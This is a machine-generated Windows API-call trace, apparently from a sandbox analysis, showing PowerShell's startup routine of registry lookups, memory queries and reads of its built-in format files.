	[0805.609] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.250] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.969] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.970] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.971] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.973] VirtualQuery (in: lpAddress=0x12c430, lpBuffer=0x12d2f0, dwLength=0x30 | out: lpBuffer=0x12d2f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0808.633] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0808.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.633] CoTaskMemFree (pv=0x2a6990) 
	[0808.651] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d8e8 | out: phkResult=0x12d8e8*=0x2f8) returned 0x0
	[0808.651] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x12d8fc, lpData=0x0, lpcbData=0x12d8f8*=0x0 | out: lpType=0x12d8fc*=0x1, lpData=0x0, lpcbData=0x12d8f8*=0x74) returned 0x0
	[0808.651] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x12d86c, lpData=0x0, lpcbData=0x12d868*=0x0 | out: lpType=0x12d86c*=0x1, lpData=0x0, lpcbData=0x12d868*=0x74) returned 0x0
	[0808.651] CoTaskMemAlloc (cb=0x78) returned 0x2823e0
	[0808.651] RegQueryValueExW (in: hKey=0x2f8, lpValueName="path", lpReserved=0x0, lpType=0x12d83c, lpData=0x2823e0, lpcbData=0x12d838*=0x74 | out: lpType=0x12d83c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d838*=0x74) returned 0x0
	[0808.651] CoTaskMemFree (pv=0x2823e0) 
	[0808.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0808.652] SetErrorMode (uMode=0x1) returned 0x1
	[0808.652] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d7c0 | out: lpFileInformation=0x12d7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0808.652] SetErrorMode (uMode=0x1) returned 0x1
	[0808.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0808.653] SetErrorMode (uMode=0x1) returned 0x1
	[0808.654] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d7c0 | out: lpFileInformation=0x12d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0808.654] SetErrorMode (uMode=0x1) returned 0x1
	[0808.654] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0808.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.655] CoTaskMemFree (pv=0x2a6990) 
	[0809.550] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0809.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.550] CoTaskMemFree (pv=0x2a6990) 
	[0809.552] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0809.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.552] CoTaskMemFree (pv=0x2a6990) 
	[0809.554] CoTaskMemAlloc (cb=0x104) returned 0x2a6990
	[0809.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6990, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0809.554] CoTaskMemFree (pv=0x2a6990) 
	[0809.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.556] SetErrorMode (uMode=0x1) returned 0x1
	[0809.556] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0809.556] GetFileType (hFile=0x314) returned 0x1
	[0809.556] SetErrorMode (uMode=0x1) returned 0x1
	[0809.556] GetFileType (hFile=0x314) returned 0x1
	[0809.556] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0809.562] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0809.565] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0809.565] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0809.588] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0809.588] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0809.588] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x9e2, lpOverlapped=0x0) returned 1
	[0809.589] ReadFile (in: hFile=0x314, lpBuffer=0x348f24a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348f24a*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0809.589] ReadFile (in: hFile=0x314, lpBuffer=0x348fd00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x348fd00*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0809.589] CloseHandle (hObject=0x314) returned 1
	[0809.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.589] SetErrorMode (uMode=0x1) returned 0x1
	[0809.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0809.590] SetErrorMode (uMode=0x1) returned 0x1
	[0809.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.590] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x314) returned 0x0
	[0809.590] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0809.590] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0809.590] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0809.590] CoTaskMemFree (pv=0x1b8497b0) 
	[0809.590] RegCloseKey (hKey=0x314) returned 0x0
	[0809.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0809.601] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x25831d1d, Data2=0xf81f, Data3=0x4784, Data4=([0]=0x8f, [1]=0xa, [2]=0xb9, [3]=0x12, [4]=0x22, [5]=0x98, [6]=0xa2, [7]=0xb1))) returned 0x0
	[0809.608] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xd17b2146, Data2=0xf109, Data3=0x4771, Data4=([0]=0xb7, [1]=0x1e, [2]=0x4c, [3]=0xc9, [4]=0x5c, [5]=0xdb, [6]=0xa, [7]=0xf0))) returned 0x0
	[0809.610] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0809.610] GetFileType (hFile=0x314) returned 0x1
	[0809.611] SetErrorMode (uMode=0x1) returned 0x1
	[0809.611] GetFileType (hFile=0x314) returned 0x1
	[0809.611] ReadFile (in: hFile=0x314, lpBuffer=0x34ba868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34ba868*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0809.612] ReadFile (in: hFile=0x314, lpBuffer=0x34ba868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34ba868*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.458] ReadFile (in: hFile=0x314, lpBuffer=0x34ba868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34ba868*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.459] ReadFile (in: hFile=0x314, lpBuffer=0x34ba868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34ba868*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.460] ReadFile (in: hFile=0x314, lpBuffer=0x34ba868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34ba868*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.461] ReadFile (in: hFile=0x314, lpBuffer=0x34ba868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34ba868*, lpNumberOfBytesRead=0x12d458*=0xfb2, lpOverlapped=0x0) returned 1
	[0810.462] ReadFile (in: hFile=0x314, lpBuffer=0x34b9f82, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b9f82*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0810.462] ReadFile (in: hFile=0x314, lpBuffer=0x34ba868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34ba868*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0810.462] CloseHandle (hObject=0x314) returned 1
	[0810.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0810.462] SetErrorMode (uMode=0x1) returned 0x1
	[0810.462] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0810.462] SetErrorMode (uMode=0x1) returned 0x1
	[0810.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0810.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x314) returned 0x0
	[0810.463] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0810.463] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0810.463] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0810.463] CoTaskMemFree (pv=0x1b8497b0) 
	[0810.463] RegCloseKey (hKey=0x314) returned 0x0
	[0810.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0810.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0810.481] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xb5b27598, Data2=0x3803, Data3=0x4db2, Data4=([0]=0x91, [1]=0x91, [2]=0xae, [3]=0xf4, [4]=0x7a, [5]=0xeb, [6]=0x67, [7]=0x3))) returned 0x0
	[0810.489] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe8233030, Data2=0xceb5, Data3=0x4229, Data4=([0]=0x80, [1]=0x70, [2]=0x7e, [3]=0xe5, [4]=0xc7, [5]=0x95, [6]=0x31, [7]=0x67))) returned 0x0
	[0810.490] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x66b1644d, Data2=0x2cda, Data3=0x4c59, Data4=([0]=0x93, [1]=0x3, [2]=0x29, [3]=0xc1, [4]=0x16, [5]=0x36, [6]=0xd4, [7]=0x34))) returned 0x0
	[0810.491] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x54cac853, Data2=0x905e, Data3=0x40ba, Data4=([0]=0x9f, [1]=0x1d, [2]=0xed, [3]=0x1, [4]=0x41, [5]=0x24, [6]=0x49, [7]=0x7a))) returned 0x0
	[0810.491] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7442d81a, Data2=0x920, Data3=0x4246, Data4=([0]=0xa0, [1]=0x2a, [2]=0xdb, [3]=0xdd, [4]=0x1e, [5]=0xaa, [6]=0x19, [7]=0xfc))) returned 0x0
	[0810.492] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7afe7989, Data2=0x4b8a, Data3=0x4e4c, Data4=([0]=0xa3, [1]=0xa2, [2]=0x84, [3]=0xe, [4]=0x31, [5]=0x9f, [6]=0xc1, [7]=0x6f))) returned 0x0
	[0810.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0810.493] SetErrorMode (uMode=0x1) returned 0x1
	[0810.493] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0810.493] GetFileType (hFile=0x2f8) returned 0x1
	[0810.493] SetErrorMode (uMode=0x1) returned 0x1
	[0810.493] GetFileType (hFile=0x2f8) returned 0x1
	[0810.493] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.493] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.493] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0810.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0xaca, lpOverlapped=0x0) returned 1
	[0811.551] ReadFile (in: hFile=0x2f8, lpBuffer=0x336e73a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336e73a*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0811.551] ReadFile (in: hFile=0x2f8, lpBuffer=0x336f108, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x336f108*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0811.551] CloseHandle (hObject=0x2f8) returned 1
	[0811.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0811.552] SetErrorMode (uMode=0x1) returned 0x1
	[0811.552] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0811.552] SetErrorMode (uMode=0x1) returned 0x1
	[0811.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0811.552] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x2f8) returned 0x0
	[0811.552] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0811.552] CoTaskMemAlloc (cb=0x5a) returned 0x1b828ba0
	[0811.552] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b828ba0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0811.552] CoTaskMemFree (pv=0x1b828ba0) 
	[0811.553] RegCloseKey (hKey=0x2f8) returned 0x0
	[0811.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
